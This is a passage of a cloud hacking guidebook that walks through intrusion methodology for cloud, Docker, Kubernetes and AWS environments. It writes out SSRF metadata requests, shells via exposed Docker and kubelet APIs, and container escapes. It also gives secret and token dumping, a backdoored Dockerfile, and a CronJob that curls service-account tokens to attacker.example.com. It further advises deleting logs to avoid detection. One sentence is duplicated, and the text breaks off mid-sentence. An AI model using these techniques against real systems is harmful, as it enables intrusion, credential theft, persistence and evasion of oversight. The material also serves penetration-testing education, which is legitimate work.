Cloud Hacking Playbook

Table Of Contents

Introduction
Cloud Basics
Introduction
Providers
Types of Cloud Computing
Cloud Computing Services
IAM
Virtual Servers
Virtual Private Cloud
Storage
Databases
Serverless
Containers
Pub/Sub
Conclusion
Cloud Hacking Basics
Introduction
Initial Access
SSRF
Source Code
Cloud Provider CLI
Environment Variables
Phishing
Cookies
Privilege Escalation
IAM
Source Code
Exploits & Misconfigurations
Lateral Movement
Enumeration
IAM
Infrastructure
Collection
Persistence
IAM
Infrastructure
Defense Evasion
Logging
Noisy logs
Conclusion
Docker Hacking
Introduction
Docker Basics
Initial Access
Exposed Docker API
Privilege Escalation
Privileged User
Docker Sock
Persistence
Docker backdoor
Conclusion
Kubernetes Hacking
Kubernetes Basics
Architecture
RBAC AKA IAM
Mitre Attack for Kubernetes
Initial Access
Exposed API
Privilege Escalation
RBAC - List Secrets
RBAC - Pod Exec
RBAC - Impersonate
Enumeration
Can I
Infrastructure
Secrets
ConfigMap
Persistence
CronJob
Conclusion
Cloud Hacking
Introduction
Over the past few years cloud computing has become increasingly popular. You no
longer need to buy servers and hardware to run your infrastructure, it can all be done in
the cloud. This is the new way of doing things. However, where there is a shift in
technology there will be a shift in security, a whole new playground has opened up and
it's in the cloud. The first two chapters give you a very basic run down of cloud
technology and cloud hacking. After that things get a little more technical and I teach
you the fundamentals of container and kubernetes hacking. Next we will go over AWS
hacking. Finally, we will go over Google Cloud Platform (GCP) which is another cloud
provider. Throughout the chapters I try to go over the technology first then I talk about
the fun stuff which is hacking. It’s important that you understand the technology you are
hacking on. If you don’t know what elastic beanstalk is then how will you know what to
look for when you come across that technology? If you want to get good at cloud
hacking it would be beneficial to read supplementary material around devops in the
cloud, cloud administration, and each of the services cloud providers offer.
Cloud Basics
Introduction
Before you can hack the cloud you must first understand the cloud and everything it
offers. Once you have the necessary prerequisite knowledge you can start the actual
fun part, hacking. You may be tempted to skip over this part but I can assure you the
only way to truly know what you are doing when hacking the cloud is by having a deep
understanding of the technology you are attacking.
Providers
When you think of cloud computing the first thing that pops into your head is probably
Amazon Web Services (AWS). It is by far the most popular platform out there, holding a
significant share of the market, but there are others as well, as shown below.
Country  Provider
USA      Amazon Web Services (AWS)
USA      Azure
Types of Cloud Computing
There are a lot of cloud providers out there but they all pretty much offer the same
services.
● Software-as-a-service (SaaS)
○ Pay to use some sort of software, for example Office 365, Dropbox, and
Slack are all considered SaaS. All you have to do is login and you can
start using the software.
● Infrastructure-as-a-service (IaaS)
○ Pay to use raw infrastructure such as virtual machines, storage, and
networking. You manage the operating system and software while the
cloud provider manages the underlying hardware.
● Platform-as-a-service (PaaS)
○ Pay to host an application, for example you might upload your back end
API to a PaaS system making it available to the world. You only have to
worry about your source code; everything else is taken care of by the
cloud provider.
Cloud Computing Services
For the most part every cloud provider offers similar services. For example, suppose you
want to spin up a virtual machine: if you're using AWS you would create an EC2
instance, but if you're using Google Cloud you would create a Compute instance. Both of
these do the same thing (create a virtual machine); the only difference is their name.
To understand the different techniques used to hack the cloud you must first understand
the technologies used by cloud providers. The following sections are meant to give you
a brief explanation of different cloud services, so if you are unfamiliar with this stuff you
will probably have to read a few blogs and watch a few YouTube videos to gain
additional insights.
IAM
Identity and Access Management (IAM) is a framework of policies and technologies for
ensuring that the proper people in an enterprise have the appropriate access to
technology resources. Basically you can think of this as your Active Directory. You can
manage your users, groups, and their associated permissions from here.
From an attacker's perspective one of the most important things about IAM is your
associated permissions. Cloud providers have very granular permissions which give you
access to specific resources. Several phases of the cloud hacking process rely on
permissions so it's important that you understand how each cloud provider implements
this feature. Also note that almost all of the privilege escalation techniques in the cloud
rely on misconfigured IAM permissions so it's definitely something you are going to want
to learn.
Virtual Servers
Instead of buying a physical server you will be using virtual servers. The only real
difference between virtual and physical servers is that you won’t have physical access
to the hardware, instead you will use SSH or RDP to interact with your machine.
Virtual Private Cloud
Your virtual private cloud (VPC) is your network; instead of having your network live on
premise it is held in the cloud. All of your virtual servers and other machines will live in
your VPC and will be given a local IP just like any other device on your local network.
Storage
Storage buckets provide a place for you to store images, documents, files, and anything
else you want. Instead of buying an NFS server, a second hard drive, or an FTP server
you can simply store everything in a storage bucket.
Databases
If your application needs to store and retrieve information you probably need some sort
of database. Cloud providers offer managed database services: pick your database type
and instance and you're all set. You can easily spin up your databases with the click of a
button.
Serverless
Serverless flips the traditional development model: instead of building one large
application and running it on a machine you create small functions which can be called
via an API call or some other trigger. If you call a function 100 times in a second it will
scale up to 100 machines, run the function then exit. Instead of paying for an entire
server you only pay for the time and CPU power your function used when it was called.
As shown above the main difference is that serverless programming breaks the
application up into many small functions instead of one monolithic codebase.
Containers
With the rise of devops and the cloud comes containers. A container lets you wrap up
your application in an image that can run on any machine regardless of the operating
system and libraries on it. Most cloud providers will have a container registry which is
used to house all of your docker containers. These providers will also have different
services for running and orchestrating those containers.
Pub/Sub
Another thing you will likely see in a cloud environment is some sort of pub/sub service.
As shown in the above image you could have two microservices publishing messages
to a topic. Then you could have three other microservices consuming the messages and
performing some sort of work. This is how multiple microservices can communicate with
each other.
Conclusion
In order to understand cloud hacking you must first understand cloud technology. Old
school networks hosted everything locally. Your users, groups, and permissions were in
an active directory server, virtual servers were hosted in vmware, and databases were
hosted on physical servers in the server room. The main takeaway you need to know
now is that all of these servers have been moved to the cloud. Instead of using a NFS
server to store files you now use the cloud provider's storage bucket. The basic
principles are the same “storing files” but the technology is slightly different. In addition
to that there are also some new concepts such as containers, serverless programming,
and pub/sub systems that you will want to get familiar with.
Cloud Hacking Basics
Introduction
No matter what cloud provider you are trying to hack you will most likely follow the same
methodology. All the major cloud providers offer similar services so if you know the
basic principles of cloud hacking you can apply the techniques to all of them, though the
technical details on how the hacks are carried out will vary depending on the cloud
provider. After hacking on multiple cloud providers I came up with the following
methodology:
1. Initial Access
2. Enumeration
3. Privilege escalation
4. Repeat step 1 - 3
5. Persistence
6. Clean up tracks
In the following sections I'll talk briefly about each phase of the attack cycle. In depth
technical details will be covered in later chapters.
Initial Access
Before you can do anything you need to first gain access to the target's cloud
environment. There are several techniques for doing this; it is up to you to decide which
technique to utilize.
SSRF
As of right now the most popular method for gaining access to a cloud environment is
server side request forgery (SSRF). I won't go into detail on the vulnerability as there are
plenty of references online, but basically SSRF is a technique used to gather cloud
credentials from the metadata service. Attackers can then use these credentials to login
to the target's cloud environment. If you want to learn more about SSRF check out the
links below:
● https://portswigger.net/web-security/ssrf
● https://cobalt.io/blog/a-pentesters-guide-to-server-side-request-forgery-ssrf
● https://www.youtube.com/watch?v=66ni2BTIjS8&ab_channel=HackerOne
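As a quick sketch of the idea, suppose a target application fetches attacker supplied URLs via a hypothetical "url" parameter; pointing it at the metadata service would look something like this:
● https://target.example.com/fetch?url=http://169.254.169.254/latest/meta-data/
If the response is reflected back to you, the metadata service (and the credentials it holds) is now readable.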
Source Code
Another popular technique for gaining initial access is looking through the target's
source code for hard coded credentials. Developers love hard
coding credentials so it's not uncommon to find AWS, GCloud, Azure, and other cloud
provider credentials being leaked on GitHub and other source code repositories. Also if
you ever compromise a host make sure to check for scripts on that host that contain
credentials.
Cloud Provider CLI
Regular users like to use the browser but admins live in the terminal. Most cloud
providers will also have their own CLI which can be used via the command line. These
tools need to be able to authenticate to the cloud provider which means the credentials
are typically stored on disk. These credentials can be found in various locations
depending on the provider; for example the AWS CLI stores them in ~/.aws/credentials.
Environment Variables
Another popular place to store cloud credentials is in environment variables. If you ever
compromise a machine make sure to check its environment variables for credentials.
Phishing
Phishing is a classic attack for compromising companies so it's no surprise that it can be
used to compromise cloud credentials as well. Just create a fake login page that looks
like the cloud provider's real login portal and phish away.
Cookies
If you compromise your target's machine and they are logged into a cloud provider you
can easily steal their cookies. An attacker could then use those cookies to login as that
user without needing their credentials.
Privilege Escalation
Cloud environments have two types of privilege escalation and lateral movement
techniques. One involves targeting cloud users and the other involves targeting the
infrastructure.
IAM
If you're looking for privilege escalation your best bet is to examine IAM permissions,
specifically what permissions your current user has. The majority of privilege escalation
flaws are due to overly permissive accounts. Cloud IAMs can have thousands of
permissions to choose from so it's very easy and common for administrators to give
users more permissions than they actually need.
Source Code
There are other ways to escalate your privileges beyond IAM policies and permissions.
For instance if you get a shell on a cloud VM or docker container you could search
through all the source code and scripts on that machine for hard coded passwords.
Exploits & Misconfigurations
You're not always going for user accounts, sometimes you may be trying to get root on
a box or you want to break out of a containerized environment. These attacks are about
gaining additional privileges on the cloud infrastructure, not the cloud users. This type of
attack is more similar to traditional pentesting and red teaming than being cloud
specific.
Lateral Movement
The biggest thing to understand is that cloud lateral movement is different from network
based lateral movement though you can also perform network based lateral movement
within a cloud environment. With cloud based lateral movement we are trying to
compromise other users within the cloud. For the most part all the techniques and
tactics used for privilege escalation can also be used for lateral movement.
Enumeration
IAM
This phase is about determining what you can access. As I've mentioned before, IAM
permissions determine what you can and can't do within the cloud environment. You
need to map out what you can and can't do. You might have restricted permissions to a
handful of services or full access to everything; you won't know until you enumerate.
Infrastructure
Everything that can be found on your local network can be spun up in the cloud. You
also need to know the infrastructure they have spun up such as:
● Virtual Machines
● Databases
● Cloud Storage(Buckets)
● Load Balancers
● VPCs
● WAFs
● Cloud Functions(Serverless)
● Kubernetes Environment
● Publish/Subscribe Systems
● Etc
Basically you want to build a network diagram of the cloud infrastructure so you can get
a complete picture of the environment.
Collection
Once you figure out what you have access to you can start searching for and collecting
sensitive data. For example, if you have access to a
database server you might try to make a backup and download it locally. If you have
access to a docker image you might download the image and inspect it for hard coded
credentials and other vulnerabilities. Depending on what you have access to this step
will vary.
Persistence
When you compromise a cloud environment it can be short lived unless you set up
some kind of persistence in the environment. Note, you can have persistence within the
cloud environment itself (IAM) as well as on the underlying infrastructure.
IAM
Generally you are going to want to have persistence within the cloud environment. This
means you are going to need a set of credentials giving you access to the cloud
environment. There are several techniques for setting up persistence and like
everything else it depends on what permissions your user has. The most common and
easiest techniques are creating new users and creating API tokens/keys for existing
users.
Infrastructure
You can also persist in the cloud environment via traditional methods. For example you
could plant backdoors on compromised machines or add
attacker controlled ssh keys to servers. We don't talk much about this type of
persistence as it falls under traditional pentesting and red teaming.
Defense Evasion
Cloud providers are really good at logging absolutely everything. While interacting with
the cloud environment you will be generating a lot of noise. There are a few techniques
that can help you stay under the radar.
Logging
Every cloud provider has some sort of logging capabilities. Just like traditional methods
one of the biggest ways to hide yourself is to simply delete the logs or disable logging.
Noisy logs
As stated earlier cloud providers seem to log everything. This can sometimes make it
hard to find your actions as there is a sea of data. If you don't look suspicious you might
be able to fly under the radar. However, you should note that if you are uncovered,
defenders will be able to trace your actions through those logs.
Conclusion
Most cloud providers offer very similar services so if you know how to attack one cloud
provider you can apply that knowledge to attack another. No matter what cloud provider
you are attacking you can always follow the same steps:
1. Initial Access
2. Enumeration
3. Privilege escalation
4. Repeat step 1 - 3
5. Persistence
6. Clean up tracks
The only thing that will change is the technical steps involved in each phase. For
example every cloud provider has a metadata url which can be leveraged by an SSRF
vulnerability to expose user credentials. This attack is part of the initial access phase
and can be leveraged for each cloud provider. The only difference is the technical steps
involved. In this chapter you learned the high level attacks involved in attacking a cloud
provider, in the next chapters we will get into the technical steps.
Docker Hacking
Introduction
Before I start talking about the cloud I think it is important that I go over containers and
how it has completely changed the way we do things. If you run into a cloud
environment there is a good chance they are using containers, as the two complement
each other very well. Before we had containers there were issues with software running
each other very well. Before we had containers there were issues with software running
fine on one computer but completely failing on another. When you deploy a piece of
software you have to make sure that endpoint has the correct operating system,
libraries, and dependencies or else it won't work. If I'm running a Mac with python
version 2.7 and the software is built for linux running python 3 then I'll run into a bunch
of issues when trying to run the program on my Mac machine. Containers help solve
this problem by creating a virtual environment AKA image that contains your operating
system, libraries, dependencies and anything else you need to run the software. You
can then take that container and run it on any machine and it will work perfectly.
Docker Basics
If an organization is using containers they are most likely using Docker to create those
containers. A Docker image is a standalone package that bundles the
application source code with the operating system (OS) libraries and dependencies
required to run it.
As you can see in the above image the way we deploy an application with Docker is a
little different than what we are used to. Docker runs on your host operating system and
each containerized application runs on top of the Docker engine, sharing the host's
kernel.
As shown above when a client is trying to build an image they can issue the “docker
build” command. This command will build your docker image which contains the
operating system, application code, dependencies, and everything else. Once the
image is built you can save that to the container registry. A container registry is a
repository, or collection of repositories, used to store container images for DevOps
and container-based application development. Now you're all set, if you want to deploy
your image you just have to pull it from the container registry and run it.
Initial Access
Exposed Docker API
When you install docker on a system it exposes a local API, which listens on port 2375
when TCP access is enabled. This API can be used to interact with the docker engine,
which basically gives you full control over docker.
Under these conditions no external party will be able to access your docker API as it
isn't exposed to the world. However, this API can be changed so that it can be accessed
by external resources. If done improperly this will expose the docker API to the entire
internet.
To confirm that a desired host is running Docker you can make a GET request to the
/version endpoint. This will print out a json blob as shown below:
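A quick sketch of the check with curl (host and port are placeholders for your target):
● curl http://<host>:2375/version
A docker host will typically answer with fields such as Version, ApiVersion, and GoVersion.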
Once you have confirmed that the docker API is exposed I will generally move to the
CLI version of docker. From the CLI you can execute the following command to get a list
of running containers:
● docker -H <host>:<port> ps
As you can see in the above image we have a single container running on port 80 with
the name of elegant_easley. We can easily pop a shell on this container by running the
following command:
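A sketch of that command, reusing the container name from above (swap in your target's host and port):
● docker -H <host>:<port> exec -it elegant_easley /bin/bash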
As you can see in the above image we were dumped right into a root shell. From there
we can do all kinds of things, depending on the docker version you may be able to use
an exploit to break out of the container into the host machine. You aren't just limited to
popping a shell on their docker container, you can do other things such as deploying
your own docker containers. This technique was widely used by cryptocurrency miners
to deploy mining containers on exposed docker hosts.
Privilege Escalation
If you get RCE on an application that is running inside of a container you are essentially
stuck in that container. Containers typically aren't long lived so if you plant your
backdoor in a container it will disappear when the container is updated or swapped out.
To prevent all your hard work from being lost you need to break out of the container into
the underlying host machine.
Privileged User
Docker images can be run with the “--privileged” flag which disables all the safeguards
and isolation provided by Docker. If a container has been run with this flag it is pretty
much game over as you will be able to access the host file system. If you run “fdisk -l”
and receive output you can assume your container is running as privileged, because if it
weren't the host's disks would be hidden from you.
The only thing left to do is mount the host file system at "/dev/sda1". From there you can
read and write any file on the host, as sketched below.
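A minimal sketch of the mount, assuming the host's root file system lives on /dev/sda1 (the device name may differ on your target):
● mkdir -p /mnt/host
● mount /dev/sda1 /mnt/host
● ls /mnt/host
From here, reading /mnt/host/etc/shadow or dropping a cron job under /mnt/host/etc/cron.d is possible.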
You could also try a public POC exploit, such as the well known cgroups release_agent
escape, which takes a slightly different approach to breaking out of a privileged
container.
Docker Sock
Docker.sock is a Unix socket that enables the Docker server-side daemon, dockerd, to
communicate with its command-line interface via a REST API. The socket appears as
the /var/run/docker.sock file. Because it is a file, admins can share and run docker.sock
within a container and then use it to communicate with that container. A container that
runs docker.sock can start or stop other containers, create images on the host or write
to the host file system. What all this means is that when you are running the "docker"
command you are really talking to the docker socket behind the scenes.
Sometimes developers will mount the docker socket inside a docker container so they
can manage other containers. This is typically done with the following command:
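A common (and dangerous) pattern looks something like the following sketch; the image name is just an example:
● docker run -it -v /var/run/docker.sock:/var/run/docker.sock ubuntu /bin/bash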
As shown above, the "-v" flag mounts the docker socket inside the docker container. All
an attacker has to do is download the
docker CLI and they will have full control over the docker API which would allow them to
delete containers, create containers, execute commands, or whatever else they wanted.
Persistence
Docker backdoor
Once you have access to the docker CLI, API, or Socket you can do all kinds of things.
As an attacker you may want to maintain some level of persistence and one of the
easiest ways of doing this is backdooring the target's docker images. If you plant
malware in a target's docker image, then every time the image is used to spin up a
container your malware will execute.
Backdooring a docker image is relatively easy. The first step is to gain access to the
image. Once you have the image downloaded locally you can use that image as a base
for your backdoored version.
In this example I'll pull the “hello-world” docker image and use that as a base for our
backdoor. You can use the “docker pull” command to download an image locally. If you
have compromised the target container repository this is where you would want to pull
the target's images from instead.
Now that we have our target image we need to create a Dockerfile which uses this
image as a base, as sketched below.
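A minimal sketch of such a Dockerfile; "backdoor.py" is a hypothetical payload, and for this to work the base image must actually contain a python interpreter:

FROM hello-world
# Copy our backdoor into the image
COPY backdoor.py /backdoor.py
# Execute the backdoor when the container starts
CMD ["python", "/backdoor.py"]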
As shown above we first use the target image as our base. Next we copy our backdoor
to the image and we use python to execute it. I'm using a python backdoor but
technically you could use anything. You can then turn this Dockerfile into an image
using the “docker build” command. Finally upload the image back into the target's
container repository replacing the legit image with our backdoored version. Once the
container is run the backdoor will execute giving you access to the instance.
This is the manual way of doing this but there are a few tools which can be used to
automate the process:
● https://github.com/cr0hn/dockerscan
● https://github.com/RhinoSecurityLabs/ccat
Conclusion
If you're dealing with a company running on the cloud there is a very high chance they
are also leveraging container technology. AWS, GCP, Azure, and every other cloud
provider has several services related to containers. This is why you need to know how
to attack containers and the platforms that run them.
Kubernetes Hacking
Kubernetes Basics
Docker is nice because you can containerize all of your applications and run them
anywhere. However, managing these docker containers can be difficult, which is where
kubernetes comes into play.
Architecture
A kubernetes cluster is made up of nodes; a node can be a virtual or physical
machine. Each node can contain several Pods. Pods are the smallest, most basic
deployable objects in kubernetes and they hold one or more
containers. When a Pod runs multiple containers, the containers are managed as a
single entity and share the Pod's resources.
What's nice about kubernetes is that it manages the deployment of your containers
automatically. If you want to have one container running on each node you can easily
do that, if you want to instantly scale up your containers so there are 1,000 instances
you can do that too. Kubernetes makes orchestrating the deployment of your containers
extremely easy.
RBAC AKA IAM
Role-based access control (RBAC) is a method of regulating access to computer or
network resources based on the roles of individual users within your organization. In
kubernetes you can have either a role or cluster role which defines your permissions.
The main difference between a role and a cluster role is that a role must be attached to
a specific namespace while a cluster role applies to the entire cluster.
When creating a role or cluster role you must specify the operation and its
corresponding resources. For example, you could use the operation "get" on the
resource “secrets” which would allow any user attached to that role the ability to list
kubernetes secrets.
In the image below you can see what this role might look like. The role type is set to
"Role", meaning it is scoped to a single namespace.
Finally this role can invoke the "get", "watch", and "list" verbs on the "secrets"
resource.
Note that these roles are heavily used in the privilege escalation phase as certain
combinations of resources and verbs can give users unintended permissions. After a
role is created it must be bound to a user via a role binding.
Mitre Attack for Kubernetes
The Mitre Attack framework is a comprehensive matrix of tactics and techniques used
by threat hunters, red teamers, and defenders to better classify attacks and assess an
organization's risk. If you have done any type of internal/network pentesting you have
probably heard of The Mitre Attack framework. Microsoft released their own version for
kubernetes which maps out the tactics and techniques used against kubernetes
environments.
We won't be going over all of the attacks in this framework as it would take up the entire
book. However, if you are interested in going a little bit deeper into kubernetes hacking,
the matrix is a great place to start.
Initial Access
Exposed API
Kubernetes exposes a REST API on port 10250 via the kubelet, which can be left
unauthenticated. If developers are not
careful this API can be exposed to the internet. A quick Shodan search will find a bunch
of these services.
Once a Kubernetes service is detected the first thing to do is to get a list of pods by
sending a GET request to the /pods endpoint. The server should respond with
something like:
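A sketch of the request with curl (the kubelet serves HTTPS, so certificate checking is skipped here):
● curl -k https://<host>:10250/pods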
From the above response we get namespace name, pod names, and container names:
● Namespace
○ monitoring
● Pod Name
○ pushgateway-5fc955dd8d-674qn
● Container Name
○ Pushgateway
With this information it is possible to send a request to the API service that will execute
a provided command. This can be done by sending the following GET request:
“https://<DOMAIN>:<PORT>/exec/<NAMESPACE>/<POD
NAME>/<CONTAINER NAME>?command=<COMMAND TO
EXECUTE>&input=1&output=1&tty=1”
After sending the request you should receive a response similar to the message below:
As you can see the above response indicates it was successful and a websocket
connection was created. Note the Location Header value, in this response its value is
equal to /cri/exec/Bwak7x7h.
To handle websocket connections use the tool wscat. This tool can be installed via npm
with "npm install -g wscat".
Now take the location header value which was noted earlier and send the following
request:
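A sketch of the connection, reusing the Location value from above (-n skips certificate verification):
● wscat -c "https://<host>:<port>/cri/exec/Bwak7x7h" -n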
As you can see in the above image the command "id" was run on the container and the
output was returned, confirming code execution.
Privilege Escalation
RBAC - List Secrets
If a user has a role attached to them which allows them to list secrets they could abuse
this to escalate privileges. When listing all secrets stored in the cluster, one of them will
be an administrative token allowing the attacker to gain the highest possible privileges
in the cluster.
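A sketch of dumping secrets with kubectl, assuming your current context points at the target cluster:
● kubectl get secrets --all-namespaces -o yaml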
As shown above we were able to dump one of the service account tokens, which could
be used to authenticate to the cluster as that service account.
RBAC - Pod Exec
If your user has the "create" permission on the "pods/exec" resource you can execute
commands inside running pods.
First you must list the names of each running pod. Once you have the names of each
pod you can connect to them (similar to ssh). After that you can read a specific file
containing the pod's token. This token can be used to interact with the kubernetes API
as that pod's service account.
As shown in the image above we connect to the pod via the following command:
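A sketch of the exec command; the pod name is whatever you pulled from "kubectl get pods":
● kubectl exec -it <pod name> -- /bin/bash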
Once we are connected to the pod we run the cat command to view the token attached
to the pod.
● cat /var/run/secrets/kubernetes.io/serviceaccount/token
RBAC - Impersonate
If a user has the ability to impersonate a user or group it could be leveraged for privilege
escalation. As shown below this role has the impersonate verb set for all users. This
means they could execute commands as any user including ones with admin privileges.
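A sketch of impersonation using the "--as" flag; "admin" is a hypothetical privileged user:
● kubectl get secrets --all-namespaces --as=admin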
As shown in the command above you can use the "--as" flag to specify a user to
impersonate.
This same technique could also be used to impersonate groups as well if the
“resources” value was set to “groups” instead of “users”. If we were to exploit this with a
group you could use the default "system:masters" group, which is automatically
bound to the cluster-admin role.
Enumeration
Once you have access to the kubernetes API you need to see what resources you can
access and what data you can collect. This will all be done through the kubernetes CLI,
and the results depend on the permissions your current user has. Kubernetes has a lot
of resources and components to enumerate.
Can I
Kubernetes doesn't have a command to list out all of your permissions and what you
have access to. This means you have to default to trial and error, which involves running
the "can-i" command for each permission you care about, as shown below.
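A sketch of the check; any verb and resource pair can be substituted:
● kubectl auth can-i get secrets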
As shown in the above image we ran the “can-i” command to see if we have access to
secrets. The API responded with “yes” indicating we do. If you need to enumerate what
commands your user has permissions to execute, the “can-i” command is the easiest
option.
Infrastructure
Nodes are the machines that make up the cluster; a node can be a virtual machine or a
physical server.
I'm typically just looking to see how many nodes there are and their associated IP
addresses. You can use “kubectl get nodes -o yaml” to output a list of nodes and all
their associated information. One of the fields returned will be the node's external IP
address.
Knowing the external IP of these nodes could potentially open up additional attacks
depending on what's running on those nodes. Also, looking at the ExternalDNS entry you
can see it's running on AWS, which means an attacker could potentially target the
underlying AWS environment as well.
In addition to nodes you should also map out the environment's pods. Pods run on
nodes and represent a specific application. For instance you might have a pod for your
front end application and another for your back end API.
Secrets
A kubernetes Secret is an object that contains a small amount of sensitive data such as
a password, a token, or a key. Using a Secret means that developers don't need to
include confidential data in their application code. However, Secrets are, by default,
stored unencrypted in the API server's underlying data store (etcd). Anyone with API
access can retrieve or modify a Secret, and so can anyone with access to etcd. If an attacker
can access the kubernetes secrets they can potentially leak sensitive information.
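A sketch of pulling a secret's contents (the data fields come back base64 encoded, so pipe them through "base64 -d"):
● kubectl get secrets
● kubectl get secret <secret name> -o yaml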
As shown in the image above there is a service account token stored as a secret. We
could dump this token and use it to authenticate to the cluster as that service account.
ConfigMap
Another popular place to store sensitive data is the config map. According to Google, "A
ConfigMap is an API object used to store non-confidential data in key-value pairs". Google
may say it's used to store non confidential data, but I see people putting sensitive data in
there all the time.
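A sketch of dumping config maps to hunt for sensitive values:
● kubectl get configmaps --all-namespaces -o yaml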
As shown in the image above the config map is holding a variable called
“AWS_KEY_SECRET”. An attacker could use this key to further compromise the AWS
environment.
Persistence
CronJob
If you are familiar with linux cron jobs then this will feel very familiar. Cron jobs can be
used to schedule commands which are run on the specified pod. Since we can run a
bash command on a pod, an attacker could schedule a job that reads the pod's service
account token and sends it to a server they control. The attacker could then use this
token to authenticate to kubernetes.
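A minimal sketch of such a CronJob manifest; "attacker.example.com" is a placeholder for your own listener, the image just needs curl available, and older clusters may require the batch/v1beta1 apiVersion:

apiVersion: batch/v1
kind: CronJob
metadata:
  name: kube-updater
spec:
  # Run every day at 1:00am
  schedule: "0 1 * * *"
  jobTemplate:
    spec:
      template:
        spec:
          restartPolicy: OnFailure
          containers:
          - name: kube-updater
            image: curlimages/curl
            command: ["/bin/sh", "-c"]
            # Post the pod's service account token to the attacker's server
            args: ["curl -X POST --data @/var/run/secrets/kubernetes.io/serviceaccount/token https://attacker.example.com/"]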
Once you have the yaml file created use the following command to create the cron job:
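Assuming the manifest above was saved as cronjob.yaml:
● kubectl apply -f cronjob.yaml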
As shown above the cron job issues a curl command every day at 1:00am which sends
the pod's service account token to the attacker's domain. Once we have the service
account token attached to the pod we can login as that service account.
Conclusion
If a company is using containers they are probably using kubernetes as well. With that
being said, there is a high probability of you coming into contact with this technology.
There are a lot of developers using kubernetes and there are several ways to
misconfigure the service. Exposing an API could lead to the compromise of every
container in the environment, and giving a user the wrong permission could allow that user
to elevate their permissions. Kubernetes is its own world and has its own attack
techniques, it's important that you understand what to do when you see this technology.
AWS Basics
Introduction
In order to attack AWS you must first understand the ins and outs of AWS; once you
do, the attacks described later will make a lot more sense. Amazon Web Services (AWS)
is by far the most popular cloud provider in the world. In 2021 they held 31% or 1/3 of the
market share. If you're doing a lot of cloud hacking you're almost guaranteed to come
across AWS at some point. To understand AWS hacking you must first understand its
services. I'll go over some of the important services, but this is a cloud hacking book, not
an AWS administration book, so I won't be covering everything.
AWS CLI
Later in the book when we start attacking the cloud we will be leveraging the CLI to do
almost everything. The AWS CLI is the best hacking tool you can ask for, it can do it all.
Learning this tool will make your life 100% easier as you will be able to perform all the
attacks discussed in this book with a single tool. The first step to using the AWS CLI is to
configure it with a set of credentials, as sketched below.
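A sketch of the interactive setup; the values are placeholders for your own keys:
● aws configure
AWS Access Key ID [None]: <access key id>
AWS Secret Access Key [None]: <secret access key>
Default region name [None]: us-east-1
Default output format [None]: json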
Once you have your credentials configured you can start issuing commands; every
command follows the pattern "aws <service> <subcommand> [options]".
The first argument is the service name. As you will learn later AWS has hundreds of
services for all kinds of things such as file storage, virtual machines, databases, ground
stations for satellites and everything else you can think of. The second argument is the
subcommand and is used to describe the operation to perform. For example if you
wanted to copy a file from an s3 bucket to your machine you would use the "cp"
subcommand of the "s3" service. There are far too many services and subcommands to
remember all of them. However, like most tools there is a help command (aws s3 help).
If you don't know how to do something, google it or use the help command as shown in
the image above.
Organization
Most of the time you will only be dealing with a single AWS account. Your account is where
your environment lives. This is where your network, firewalls, servers, databases, users
and everything else are located. Some organizations may want to group multiple AWS
accounts together; this is done with organizational units (OUs). Anything
applied to the OU will also be applied to the AWS accounts under it. This makes
managing multiple AWS accounts a lot easier as you only have to apply a setting to the
OU and it will be applied to all AWS accounts under it. Finally at the top of the hierarchy
you have Root. You can think of root as the container for all OUs and accounts.
Anything applied to the root will be applied to everything else under it.
IAM
Users
AWS has two kinds of users: root and everything else. The root user is the owner of the
cloud account and has full control over the cloud environment. If the root user gets
compromised it is effectively game over for the target.
You can create additional users which can be used to access the cloud environment as
shown in the image above. Unless you get really lucky you will mostly be dealing with
these normal IAM users rather than root.
Groups
Groups are a way of clustering several users together. This is really useful when
assigning permissions to a large group of people. As shown in the image above there
are a lot of users in the admin group. If you wanted to add additional permissions to
those users, you would apply a policy to the admin group and it would be applied to the
entire group at once.
Role
A role is another type of identity similar to a user. Roles have specific permissions
attached to them and can be assumed by other identities, which
means other applications, services, and users can perform a task as that role. User A
might not have access to a database but Role B does. If user A is able to assume the
role of Role B then user A would have access to the database as well.
Policy
Policies are used to give users and groups access to specific resources. A policy either
allows or denies access to a resource. If a policy gives you access to a
resource you will be able to access it, otherwise you will be blocked by default.
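A sketch of what such a policy document looks like; this one mirrors the S3 example discussed below:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "s3:*",
      "Resource": "*"
    }
  ]
}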
If the above policy were attached to a user it would grant them full access to all S3
buckets. AWS comes with hundreds of pre-built
policies but you can also define your own. As a security professional it is very important
that you understand how policies work as they are the backbone of the IAM system.
As an attacker you really want to pay attention to the “Effect”, “Action”, and “Resource”
fields of a policy. In our example the Effect field is set to “Allow”, this means the policy is
giving us access to something, if it was set to “Deny” it would mean we are blocking
access. The Action field specifies what actions we are allowing or denying. In our case
we are allowing all actions associated with S3, as denoted by the "*" value. This means we
can list, create, delete, and everything else to S3 buckets. Finally the “Resource” field
specifies which resource our policy applies to. You could specify a specific S3 bucket in
there, locking us down to a single resource. However, the wild card character "*" is used
here, so the policy applies to every S3 bucket.
EC2
Elastic Compute Cloud (EC2) instances are AWS's virtual servers. If you want to
spin up a linux or windows machine you are probably going to do it via an EC2 instance.
AMI
An Amazon Machine Image(AMI) is a master image for the creation of virtual servers.
The AMI holds the operating system and any default applications you want installed.
The AMI is the base image that is used to install virtual machines.
If you want to install linux you might use the Ubuntu AMI. As shown above there are
AMIs for all the popular operating systems.
EBS
Elastic Block Storage (EBS) acts as a virtual disk for your virtual machine. You can think
of it as the hard drive attached to your EC2 instance.
Security Group
Security groups are like your host based firewall. By default your security group will
block all inbound traffic.
To open a specific port you must specify it in the inbound rules. As shown above we are
opening port 80 with a source of "0.0.0.0/0". This means we are allowing anyone on the
internet to reach port 80.
VPC
A Virtual Private Cloud (VPC) is your network, and just like a typical local network you
can break it up into subnets. As shown below there is a VPC (10.0.0.0/16) with two
subnets inside of it.
When you create resources such as EC2 instances they live in a VPC and are given a
local IP just like any other network. The VPC is your local network just in the cloud.
Database
RDS
Amazon Relational Database Service (RDS) is a managed SQL database service. Here
you can spin up mysql, oracle, and much more as shown in the below image:
These instances are extremely easy to spin up and run on top of EC2 instances.
NoSql
NoSql services are getting increasingly popular and AWS has a couple of offerings. You
can use Amazon's managed DynamoDB service to handle this, and AWS has other
NoSql offerings as well.
Graph DBS
Graph databases are also starting to gain popularity and AWS has its own graph
database offering called Amazon Neptune.
S3 Buckets
I'm sure the vast majority of people have heard of S3 buckets, but if you have not, an S3
bucket is a cloud storage resource. It is the go to place for storing uploaded files,
images, documents, and other objects.
As you can see above we are storing a bunch of images in this S3 bucket.
Elastic BeanStalk
According to Google, AWS Elastic Beanstalk is an easy-to-use service for deploying and
